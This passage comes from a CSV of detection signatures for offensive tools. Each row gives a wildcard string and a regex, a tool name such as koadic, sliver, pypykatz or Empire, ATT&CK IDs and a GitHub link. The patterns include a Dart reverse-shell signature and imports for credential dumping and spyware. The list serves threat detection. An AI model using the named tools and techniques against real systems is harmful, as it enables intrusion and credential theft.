NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*implant/pivot/*",".{0,1000}implant\/pivot\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*implant/sliver/*",".{0,1000}implant\/sliver\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*Implant\SleepMask*",".{0,1000}Implant\\SleepMask.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*implant_rootkit.sh*",".{0,1000}implant_rootkit\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - 
TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*implant-callback.*",".{0,1000}implant\-callback\..{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*Implants/powershell.ps1*",".{0,1000}Implants\/powershell\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*ImplantSSP.csproj*",".{0,1000}ImplantSSP\.csproj.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*import _eternalhush*",".{0,1000}import\s_eternalhush.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*import apypykatz*",".{0,1000}import\sapypykatz.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*import BaseSprayModule*",".{0,1000}import\sBaseSprayModule.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*import check_currrent_user_privilege*",".{0,1000}import\scheck_currrent_user_privilege.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*import check_sudoers_misconfigurations*",".{0,1000}import\scheck_sudoers_misconfigurations.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*import 
'dart:io';*Socket.connect(*, *Process.start('sh', [])*socket.write(output);*",".{0,1000}import\s\'dart\:io\'\;.{0,1000}Socket\.connect\(.{0,1000},\s.{0,1000}Process\.start\(\'sh\',\s\[\]\).{0,1000}socket\.write\(output\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*import DCSYNC*",".{0,1000}import\sDCSYNC.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*import DNSListener*",".{0,1000}import\sDNSListener.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*import DPLootSMBConnection*",".{0,1000}import\sDPLootSMBConnection.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*import EnablePersistence*",".{0,1000}import\sEnablePersistence.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" 
"*import eternalhush.*",".{0,1000}import\seternalhush\..{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*import EVILRDPConsole*",".{0,1000}import\sEVILRDPConsole.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*import EvilRDPGUI*",".{0,1000}import\sEvilRDPGUI.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*import IBurpExtender*",".{0,1000}import\sIBurpExtender.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential 
Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1749","335","2024-03-17T17:15:56Z","2020-06-08T10:50:12Z" "*import impacket*",".{0,1000}import\simpacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*import ImpactDecoder*",".{0,1000}import\sImpactDecoder.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*import ImpactPacket*",".{0,1000}import\sImpactPacket.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*import LdapSearchBofParser*",".{0,1000}import\sLdapSearchBofParser.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - 
TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*import metame",".{0,1000}import\smetame","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","0","N/A","N/A","6","563","87","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z" "*import mythic*",".{0,1000}import\smythic.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*import np_server*",".{0,1000}import\snp_server.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*import org.jnativehook.keyboard.NativeKeyListener*",".{0,1000}import\sorg\.jnativehook\.keyboard\.NativeKeyListener.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*import Payload*",".{0,1000}import\sPayload.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*import pe.OBJExecutable*",".{0,1000}import\spe\.OBJExecutable.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/wumb0/rust_bof","1","0","N/A","10","10","221","23","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z" "*Import powerview*",".{0,1000}Import\spowerview.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*import PupyConfig*",".{0,1000}import\sPupyConfig.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*import pypykatz*",".{0,1000}import\spypykatz.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*import saint.email.SendEmail*",".{0,1000}import\ssaint\.email\.SendEmail.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - 
TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*import saint.screenshot.Screenshot*",".{0,1000}import\ssaint\.screenshot\.Screenshot.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*import saint.webcam.Cam*",".{0,1000}import\ssaint\.webcam\.Cam.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*import ShadowForgeHome*",".{0,1000}import\sShadowForgeHome.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*import Stager*",".{0,1000}import\sStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Import stealed session to Chromium..*",".{0,1000}Import\sstealed\ssession\sto\sChromium\.\..{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*import udmp_parser*",".{0,1000}import\sudmp_parser.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","172","24","2024-02-25T13:18:10Z","2022-01-30T18:56:21Z" "*import wapiti*",".{0,1000}import\swapiti.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*import wfuzz*",".{0,1000}import\swfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" 
"*import*autorecon.config*",".{0,1000}import.{0,1000}autorecon\.config.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*import*autorecon.plugins*",".{0,1000}import.{0,1000}autorecon\.plugins.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*import/nessus/*",".{0,1000}import\/nessus\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*import/nexpose*",".{0,1000}import\/nexpose.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*import_msf_web*",".{0,1000}import_msf_web.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ImportDll::GetAsyncKeyState*",".{0,1000}ImportDll\:\:GetAsyncKeyState.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Import-DllImports -PEInfo *",".{0,1000}Import\-DllImports\s\-PEInfo\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Import-DllImports*",".{0,1000}Import\-DllImports.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Import-DllInRemoteProcess*",".{0,1000}Import\-DllInRemoteProcess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in 